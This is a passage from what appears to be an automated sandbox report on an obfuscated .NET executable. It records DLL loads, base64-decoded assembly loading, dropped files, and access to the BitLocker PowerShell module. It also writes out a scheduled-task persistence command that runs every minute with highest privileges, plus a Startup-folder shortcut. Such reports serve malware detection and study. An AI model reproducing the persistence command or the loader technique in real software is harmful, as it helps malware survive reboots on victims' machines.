                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\SYSTEMSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: SYSTEM.lnk.0.drLNK file: ..\..\..\..\..\SYSTEM
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: ANuh30XoVu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: ANuh30XoVu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: ANuh30XoVu.exe, rF6MpL4VH7RZsGgle.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{OqIX7dzocFBm74Rmc.UWpBSYMlw8GpCoQVM,OqIX7dzocFBm74Rmc.TwMpoRHqlDTWGnP9a,OqIX7dzocFBm74Rmc._15xXWf4xG8nVQD2CN,OqIX7dzocFBm74Rmc.FFV2KHnJtorploaWq,KTScPNetoTASaJuYX.eCtE3GsQNgIk7zoJI()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: ANuh30XoVu.exe, rF6MpL4VH7RZsGgle.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{zkhy7I2hQaWiYBHTV[2],KTScPNetoTASaJuYX.fFYTvItGta09HNcnd(Convert.FromBase64String(zkhy7I2hQaWiYBHTV[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: SYSTEM.0.dr, rF6MpL4VH7RZsGgle.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{OqIX7dzocFBm74Rmc.UWpBSYMlw8GpCoQVM,OqIX7dzocFBm74Rmc.TwMpoRHqlDTWGnP9a,OqIX7dzocFBm74Rmc._15xXWf4xG8nVQD2CN,OqIX7dzocFBm74Rmc.FFV2KHnJtorploaWq,KTScPNetoTASaJuYX.eCtE3GsQNgIk7zoJI()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: SYSTEM.0.dr, rF6MpL4VH7RZsGgle.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{zkhy7I2hQaWiYBHTV[2],KTScPNetoTASaJuYX.fFYTvItGta09HNcnd(Convert.FromBase64String(zkhy7I2hQaWiYBHTV[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: ANuh30XoVu.exe, rF6MpL4VH7RZsGgle.cs.Net Code: AvqhuNB4TBjbK8xmm System.AppDomain.Load(byte[])
                    Source: ANuh30XoVu.exe, rF6MpL4VH7RZsGgle.cs.Net Code: YfO0DxC9SrEeXjHBq System.AppDomain.Load(byte[])
                    Source: ANuh30XoVu.exe, rF6MpL4VH7RZsGgle.cs.Net Code: YfO0DxC9SrEeXjHBq
                    Source: SYSTEM.0.dr, rF6MpL4VH7RZsGgle.cs.Net Code: AvqhuNB4TBjbK8xmm System.AppDomain.Load(byte[])
                    Source: SYSTEM.0.dr, rF6MpL4VH7RZsGgle.cs.Net Code: YfO0DxC9SrEeXjHBq System.AppDomain.Load(byte[])
                    Source: SYSTEM.0.dr, rF6MpL4VH7RZsGgle.cs.Net Code: YfO0DxC9SrEeXjHBq
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeCode function: 0_2_00007FFD9B7723FD push ebx; ret 0_2_00007FFD9B77244A
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeCode function: 0_2_00007FFD9B7700BD pushad ; iretd 0_2_00007FFD9B7700C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B67D2A5 pushad ; iretd 1_2_00007FFD9B67D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7900BD pushad ; iretd 1_2_00007FFD9B7900C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B862316 push 8B485F91h; iretd 1_2_00007FFD9B86231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B861AC8 push es; retf 1_2_00007FFD9B861AC9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B65D2A5 pushad ; iretd 4_2_00007FFD9B65D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7700BD pushad ; iretd 4_2_00007FFD9B7700C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B842316 push 8B485F93h; iretd 4_2_00007FFD9B84231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B63D2A5 pushad ; iretd 7_2_00007FFD9B63D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B750E10 push eax; retf 7_2_00007FFD9B750E1D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7500BD pushad ; iretd 7_2_00007FFD9B7500C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B822316 push 8B485F95h; iretd 7_2_00007FFD9B82231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B64D2A5 pushad ; iretd 11_2_00007FFD9B64D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7600BD pushad ; iretd 11_2_00007FFD9B7600C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B832316 push 8B485F94h; iretd 11_2_00007FFD9B83231B
                    Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7500BD pushad ; iretd 15_2_00007FFD9B7500C1
                    Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7700BD pushad ; iretd 16_2_00007FFD9B7700C1
                    Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7800BD pushad ; iretd 18_2_00007FFD9B7800C1
                    Source: ANuh30XoVu.exe, OqIX7dzocFBm74Rmc.csHigh entropy of concatenated method names: '_9VOtbRFDqpvzqVnNAR7cvH6aGbCJjaaEtsa', 'fH5hp0iTpsObbtDJZyskmGMkgIBlwpKyhjq', 'qBYCOtPIhocDBUvasN3fRVwh74rcPPI74Sa', 'Ddn7ggLTXcOnFJdQvKaYJoaC27FsaynTu8W'
                    Source: ANuh30XoVu.exe, nIZicDwUORilJikzEl4gsyj8DdCoTIE0PjCt5CbW3f6yiQUdFy.csHigh entropy of concatenated method names: 'QssCHKjO1LxRS2jRDoprv3gJDOSHpneP62Yel4uFHCfkAAbpGl', '_0CL8XxXUJLxGiZd9Ojihvo5leRY2GTna18mHO5NUyIDBvR0zQO', 'Eyqm6CcsfNhOA79rP1dip8eMUTGwJSOYDRfA788zHoSLh92u3q', 'p0e2Oiew8UwKxVpdUPqTj6GYwaPobrDvawFGP84QTagiwP7DPfvPnxw34yMQz7yo3oh', 'K42LihWhhV5xmcLmcaWrQLsshvm1IWZJmoZaPvgQ2Q8niAjDwSxx0rOLv741gQxzYvF', 'NI0aBnCfdjrAf11u4wZi5yMz9NFvR2yHXDj2lr3viQpn6X3KUsb4b0VtPuZbMLbf0sh', 'Yw1zd81qNbGLXSX1ufPYYAG1xmQ009xtFZu2xfsXAwc2ZWsIUElcVcGrrmwfPdaR9eU', '_40IsrarHNaJ5qTGcQ4n2ADZhYCT3CaWIZKlsfsEM0eKyLtbww0JbqdkzAzFY8ZPny0l', 'lDlTOpWJMDMKQDvgeeFyWoEPOYZl1rEEW042kDGaV2Sh7L3fXfIHpcIAmA34rTvHlsN', 'vALtknVVM4TK7SrDDgckA8D8piSCySvEmLbrxwv8zCXiq502Ycxokn80gwdAbQgxe8h'
                    Source: ANuh30XoVu.exe, vEsyjkX9RCufbrBhI.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'N2aOZyQ6WUIznymn0cHGvf6TRdcYiDeRahFLfZ0QUEQuKh2YqK', 'MvadTWgbb3NSppYQoEsQIxGjsFHqbDIFN0kRdcxDPn13EEI2P4', 'j7GueDf3EsNjFfwKUM2S6YWAqPsG7mY0hin9WmLxUxEdKiRANN', 'jI1s6aKpVrjkgr2b9w5jjNAcSyGtljzHDaYEnDk0kC7nVAsrpr'
                    Source: ANuh30XoVu.exe, ky3DMEYyogSR5YkmB.csHigh entropy of concatenated method names: 'pijWkUylIhh79EpRd', 'OB6LxWdqQBjvn7QVI', 'LVll9sPJ6hOetpUUD', 'dHnrKiJ74mywRiq1P', 'Imfu66mIXQJKThKSE', 'd0UHwb7Xek9UhGios', 'UYWhPKn5lrtWCEFgL', 'pU104GqL7YBDPZNPH', 'BmuhrELb94IUWojHo', '_1qOgxz7xNWgQU1V2c'
                    Source: ANuh30XoVu.exe, rF6MpL4VH7RZsGgle.csHigh entropy of concatenated method names: 'HPbSqiG08WR1ZqQJp', 'AvqhuNB4TBjbK8xmm', 'GPdaYr5JTmowqM1Bt', 'Gko6Okz8PpNnnIr0e', 'MmxrE5WJw5lvULhyD', 'qcBkMEZRKcz8WLXaZ', 'ZM7C3ujoS5JpMefQ1', '_4JT84PTTiEB3dFnD1', 'qdijQgEpceA5wg3iO', 'GNphlClIuGRqhnvx1'
                    Source: ANuh30XoVu.exe, vxjGd1yE2vEcsX1Hq.csHigh entropy of concatenated method names: 'SHSmAOyzM6e6W8Pqi', 'BAdLGSMQvNotocryDhegmYNkgmIjf5V1Haw', 'i6AYiMjDk6yslTrqfbBVAkDbOYZLHty3Ios', '_0bMZ7fYV6Q5nFPKw9D8yaB7OeHt9rZuhD2I', 'IYCvYJft37pMPXzG00upT8GT0WDqR2rtTD8'
                    Source: ANuh30XoVu.exe, 8zlCFAoKPODWE0YaT.csHigh entropy of concatenated method names: 'nFC4nrdkhEk1Q3yRL', 'RXSwC9apSrkDTyu0vTEgJeVw0p8MbBiKTyL', 'pJ8b6PlDSKgxfPD6pQeBDnB3N48crnimjOa', '_05LgDoAthdfKAZzpbLZKRrsBE6mmOozOQqu', 'JgEJixKxYvNzA4Hj1RvoVqNFde1Xs937Quo'
                    Source: ANuh30XoVu.exe, AOvkWnxerkfqJXAKg.csHigh entropy of concatenated method names: '_5ISSzOXifdy0lFBqc', '_5MgwyM77KQr7Mk3Sx', 'Vy9sVVllWKQtPrSEM', 'DWxWAw50VjcV2jY5r', 'fiGYReqymuca0NrEUK1E16TNZVlumifBCee', 'mUbnCmc93rnZxJp1sE927NiLAfffVJE5sf0', '_8WR5tUnya5upatdu6OIyaqN0QldPfvQN3Bk', 'hdIIh37pxu4kmW3bfGSYUXOghuUMzJFjnNW', 'mehEDHr7qa5E0G8ATWtgd5LsaLXzOiWvWHN', '_31gM1jne35uWnQyPJSJPHRTt33j6R0qkGsh'
                    Source: ANuh30XoVu.exe, KTScPNetoTASaJuYX.csHigh entropy of concatenated method names: 'b7kmoaTtcHIW3e1Yt', 'oTCAVjPnSKChsrZD0', 'ifh5CzewdXeoMyn7z', 'rtnzbGD6zQG878ndp', 'ZIoJwDP1ixb4Db5n4', 'IsHjhASJTOJaR8WPC', 'tfsyy70mKXuzIxgls', 'dU1DLeg6iVvkFWwOS', 'hiHUaWAhRSDL0H8jc', '_2ykQtNOnSKNU6csxI'
                    Source: ANuh30XoVu.exe, rsTlImTezUC9RzPgE.csHigh entropy of concatenated method names: 'P9ubxNc9tqH2lJAH1', 'XIEcnw8VJsNR0nmj9', 'Bl02RLoEPeaNvKZ6O', 'ADgntMBSzxdv6bkTA', '_4062TcRmREfupxyD5', 'cMCVfygWZH7vdYYoh', 'QKKsG5ro1gSaKmoHV', 'AjWZpiL5r4ub9gjyf', 'diqhioftGOIPcm6KJ', '_65IBejY9kgGuR4J0v'
                    Source: ANuh30XoVu.exe, m0wnxK1W2amnmeWtg.csHigh entropy of concatenated method names: 'NYH1bTbGXUF5O3w2P', 'ESnB5uVyo8bl3Yj96', 'jIimDXOJV95KkQZjM', 'TSv0C6BYI92zamO2f', 'yaz1gZEdqZ1Vx8Gr8', 'sVF420vXRPsSssFqh', 'ZJS1Ne6uQpZdn7KmV', 'uSe74asxqDQMMhGsC', 'L0V7ppVMc4S5FTmPS', 'ELoGAR17iX3YtaOL5'
                    Source: SYSTEM.0.dr, OqIX7dzocFBm74Rmc.csHigh entropy of concatenated method names: '_9VOtbRFDqpvzqVnNAR7cvH6aGbCJjaaEtsa', 'fH5hp0iTpsObbtDJZyskmGMkgIBlwpKyhjq', 'qBYCOtPIhocDBUvasN3fRVwh74rcPPI74Sa', 'Ddn7ggLTXcOnFJdQvKaYJoaC27FsaynTu8W'
                    Source: SYSTEM.0.dr, nIZicDwUORilJikzEl4gsyj8DdCoTIE0PjCt5CbW3f6yiQUdFy.csHigh entropy of concatenated method names: 'QssCHKjO1LxRS2jRDoprv3gJDOSHpneP62Yel4uFHCfkAAbpGl', '_0CL8XxXUJLxGiZd9Ojihvo5leRY2GTna18mHO5NUyIDBvR0zQO', 'Eyqm6CcsfNhOA79rP1dip8eMUTGwJSOYDRfA788zHoSLh92u3q', 'p0e2Oiew8UwKxVpdUPqTj6GYwaPobrDvawFGP84QTagiwP7DPfvPnxw34yMQz7yo3oh', 'K42LihWhhV5xmcLmcaWrQLsshvm1IWZJmoZaPvgQ2Q8niAjDwSxx0rOLv741gQxzYvF', 'NI0aBnCfdjrAf11u4wZi5yMz9NFvR2yHXDj2lr3viQpn6X3KUsb4b0VtPuZbMLbf0sh', 'Yw1zd81qNbGLXSX1ufPYYAG1xmQ009xtFZu2xfsXAwc2ZWsIUElcVcGrrmwfPdaR9eU', '_40IsrarHNaJ5qTGcQ4n2ADZhYCT3CaWIZKlsfsEM0eKyLtbww0JbqdkzAzFY8ZPny0l', 'lDlTOpWJMDMKQDvgeeFyWoEPOYZl1rEEW042kDGaV2Sh7L3fXfIHpcIAmA34rTvHlsN', 'vALtknVVM4TK7SrDDgckA8D8piSCySvEmLbrxwv8zCXiq502Ycxokn80gwdAbQgxe8h'
                    Source: SYSTEM.0.dr, vEsyjkX9RCufbrBhI.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'N2aOZyQ6WUIznymn0cHGvf6TRdcYiDeRahFLfZ0QUEQuKh2YqK', 'MvadTWgbb3NSppYQoEsQIxGjsFHqbDIFN0kRdcxDPn13EEI2P4', 'j7GueDf3EsNjFfwKUM2S6YWAqPsG7mY0hin9WmLxUxEdKiRANN', 'jI1s6aKpVrjkgr2b9w5jjNAcSyGtljzHDaYEnDk0kC7nVAsrpr'
                    Source: SYSTEM.0.dr, ky3DMEYyogSR5YkmB.csHigh entropy of concatenated method names: 'pijWkUylIhh79EpRd', 'OB6LxWdqQBjvn7QVI', 'LVll9sPJ6hOetpUUD', 'dHnrKiJ74mywRiq1P', 'Imfu66mIXQJKThKSE', 'd0UHwb7Xek9UhGios', 'UYWhPKn5lrtWCEFgL', 'pU104GqL7YBDPZNPH', 'BmuhrELb94IUWojHo', '_1qOgxz7xNWgQU1V2c'
                    Source: SYSTEM.0.dr, rF6MpL4VH7RZsGgle.csHigh entropy of concatenated method names: 'HPbSqiG08WR1ZqQJp', 'AvqhuNB4TBjbK8xmm', 'GPdaYr5JTmowqM1Bt', 'Gko6Okz8PpNnnIr0e', 'MmxrE5WJw5lvULhyD', 'qcBkMEZRKcz8WLXaZ', 'ZM7C3ujoS5JpMefQ1', '_4JT84PTTiEB3dFnD1', 'qdijQgEpceA5wg3iO', 'GNphlClIuGRqhnvx1'
                    Source: SYSTEM.0.dr, vxjGd1yE2vEcsX1Hq.csHigh entropy of concatenated method names: 'SHSmAOyzM6e6W8Pqi', 'BAdLGSMQvNotocryDhegmYNkgmIjf5V1Haw', 'i6AYiMjDk6yslTrqfbBVAkDbOYZLHty3Ios', '_0bMZ7fYV6Q5nFPKw9D8yaB7OeHt9rZuhD2I', 'IYCvYJft37pMPXzG00upT8GT0WDqR2rtTD8'
                    Source: SYSTEM.0.dr, 8zlCFAoKPODWE0YaT.csHigh entropy of concatenated method names: 'nFC4nrdkhEk1Q3yRL', 'RXSwC9apSrkDTyu0vTEgJeVw0p8MbBiKTyL', 'pJ8b6PlDSKgxfPD6pQeBDnB3N48crnimjOa', '_05LgDoAthdfKAZzpbLZKRrsBE6mmOozOQqu', 'JgEJixKxYvNzA4Hj1RvoVqNFde1Xs937Quo'
                    Source: SYSTEM.0.dr, AOvkWnxerkfqJXAKg.csHigh entropy of concatenated method names: '_5ISSzOXifdy0lFBqc', '_5MgwyM77KQr7Mk3Sx', 'Vy9sVVllWKQtPrSEM', 'DWxWAw50VjcV2jY5r', 'fiGYReqymuca0NrEUK1E16TNZVlumifBCee', 'mUbnCmc93rnZxJp1sE927NiLAfffVJE5sf0', '_8WR5tUnya5upatdu6OIyaqN0QldPfvQN3Bk', 'hdIIh37pxu4kmW3bfGSYUXOghuUMzJFjnNW', 'mehEDHr7qa5E0G8ATWtgd5LsaLXzOiWvWHN', '_31gM1jne35uWnQyPJSJPHRTt33j6R0qkGsh'
                    Source: SYSTEM.0.dr, KTScPNetoTASaJuYX.csHigh entropy of concatenated method names: 'b7kmoaTtcHIW3e1Yt', 'oTCAVjPnSKChsrZD0', 'ifh5CzewdXeoMyn7z', 'rtnzbGD6zQG878ndp', 'ZIoJwDP1ixb4Db5n4', 'IsHjhASJTOJaR8WPC', 'tfsyy70mKXuzIxgls', 'dU1DLeg6iVvkFWwOS', 'hiHUaWAhRSDL0H8jc', '_2ykQtNOnSKNU6csxI'
                    Source: SYSTEM.0.dr, rsTlImTezUC9RzPgE.csHigh entropy of concatenated method names: 'P9ubxNc9tqH2lJAH1', 'XIEcnw8VJsNR0nmj9', 'Bl02RLoEPeaNvKZ6O', 'ADgntMBSzxdv6bkTA', '_4062TcRmREfupxyD5', 'cMCVfygWZH7vdYYoh', 'QKKsG5ro1gSaKmoHV', 'AjWZpiL5r4ub9gjyf', 'diqhioftGOIPcm6KJ', '_65IBejY9kgGuR4J0v'
                    Source: SYSTEM.0.dr, m0wnxK1W2amnmeWtg.csHigh entropy of concatenated method names: 'NYH1bTbGXUF5O3w2P', 'ESnB5uVyo8bl3Yj96', 'jIimDXOJV95KkQZjM', 'TSv0C6BYI92zamO2f', 'yaz1gZEdqZ1Vx8Gr8', 'sVF420vXRPsSssFqh', 'ZJS1Ne6uQpZdn7KmV', 'uSe74asxqDQMMhGsC', 'L0V7ppVMc4S5FTmPS', 'ELoGAR17iX3YtaOL5'
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile created: C:\Users\user\AppData\Roaming\SYSTEMJump to dropped file
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile created: C:\Users\user\AppData\Roaming\SYSTEMJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnkJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnkJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
